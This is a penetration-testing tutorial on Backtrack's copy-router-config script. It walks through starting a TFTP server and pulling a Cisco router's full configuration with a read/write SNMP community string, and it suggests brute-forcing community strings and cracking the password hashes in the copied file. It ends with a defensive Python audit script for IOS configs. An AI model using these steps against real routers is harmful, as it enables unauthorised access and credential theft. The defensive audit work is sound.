The copy-router-config menu item, which is located in the Backtrack menu (Backtrack > Vulnerability Assessment > Network Assessment > Cisco Tools), is a handy little Perl script put together by Muts himself. Once you click on the menu item, it will launch a terminal window in the /pentest/cisco/copy-router-config directory, so you will have direct access to the 35-line Perl script, which serves a single purpose: to copy an entire router configuration file from a Cisco device if you have a RW (read/write) community string for the router.
Launch TFTP Server To Accept Cisco Router Configuration:
If you do not have a TFTP server available on your local network, you will need to launch one in Backtrack. This can be done by issuing a single command from the Backtrack CLI, as shown in the example below.
Launch TFTP Server Backtrack Linux:
- root@bt:/pentest/cisco/copy-router-config# in.tftpd --daemon
The default TFTP directory in Backtrack 5 R3 is /srv/tftp and should work fine for the task of copying the Cisco router's configuration. The script does note that the /tmp directory is preferred, but again I have not run into any issues using the default /srv/tftp directory. Once you have issued the above command, you can make sure the TFTP server is running properly by using netstat, as shown in the example output below.
Verify TFTP Server Running In Backtrack Linux:
- root@bt:/pentest/cisco/copy-router-config# netstat -atnpu | grep 69
- udp 0 0 0.0.0.0:69 0.0.0.0:* 4724/in.tftpd
Once you know the TFTP server is running and you have a RW community string for the Cisco router (which you can attempt to brute force using ADMsnmp or onesixtyone), you can grab the entire configuration using the copy-router-config script, as shown in the example below. It should be noted again that you will not be able to obtain the Cisco router configuration with a RO (read-only) SNMP community string, so verify that the community string is RW (read/write); otherwise you will receive errors.
Copy Entire Cisco Router Configuration File With copy-router-config:
- root@bt:/pentest/cisco/copy-router-config# perl copy-router-config.pl 192.168.1.22 192.168.1.88 private
- 192.168.1.88:pwnd-router.config -> 192.168.1.22:running-config... OK
Bingo… that's it. Depending on this device's location in the network, you should now be able to understand a lot more about the target's network by analyzing the Cisco router configuration. You will likely also have hashes for the user accounts configured on the device, and once cracked they should open more doors to explore. The Cisco router configuration file will be located in /srv/tftp and named pwnd-router.config. Be careful if you are grabbing numerous router configurations, because the next one you grab will overwrite the first if you have not renamed it before grabbing the second Cisco router's configuration file. Thanks for the script Muts!
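From the defender's side, everything above depends on a RW community string that is guessable and not restricted by an access list, and the copied file then exposes the credential hashes it contains. The Python script below is an added example, not part of the original post or of Muts's script: it audits an IOS configuration for those settings. The sample configuration, the community names in it and the function name audit_ios_config are constructed for illustration.

```python
import re

# Constructed sample IOS configuration for illustration (not from a real device).
SAMPLE_CONFIG = """\
hostname lab-rtr1
enable secret 5 $1$CONSTRUCTED$notarealhash000000000
username admin privilege 15 password 7 CONSTRUCTED0000
access-list 10 permit 192.168.1.50
snmp-server community public RO
snmp-server community private RW
snmp-server community n0c-Wr1te RW 10
"""

# snmp-server community <string> [view <name>] [RO|RW] [<acl>]
COMMUNITY_RE = re.compile(
    r"^snmp-server community (\S+)(?: view \S+)?(?: (RO|RW))?(?: (\S+))?$", re.I)
# "password 7 ..." / "secret 5 ..." on enable and username lines
CRED_RE = re.compile(r"^(?:enable|username \S+).*\b(?:password|secret) ([57]) \S+", re.I)
WELL_KNOWN = {"public", "private"}


def audit_ios_config(text):
    """Return (severity, line_number, message) findings for one config."""
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        m = COMMUNITY_RE.match(line)
        if m:
            # IOS treats a community with no RO/RW keyword as read-only.
            name, mode, acl = m.group(1), (m.group(2) or "RO").upper(), m.group(3)
            if mode == "RW" and acl is None:
                findings.append(("HIGH", number, f"RW community '{name}' has no access list"))
            if name.lower() in WELL_KNOWN:
                findings.append(("HIGH" if mode == "RW" else "MEDIUM", number,
                                 f"well-known {mode} community '{name}'"))
            continue
        m = CRED_RE.match(line)
        if m and m.group(1) == "7":
            findings.append(("HIGH", number, "type 7 password is reversible obfuscation"))
        elif m:
            findings.append(("MEDIUM", number, "type 5 (MD5-based) hash is open to offline cracking"))
    return findings


if __name__ == "__main__":
    for severity, number, message in audit_ios_config(SAMPLE_CONFIG):
        print(f"{severity:6} line {number}: {message}")
```

A RW community bound to an access list (line 7 of the sample) produces no finding, but the script does not check that the referenced access list exists or what it permits.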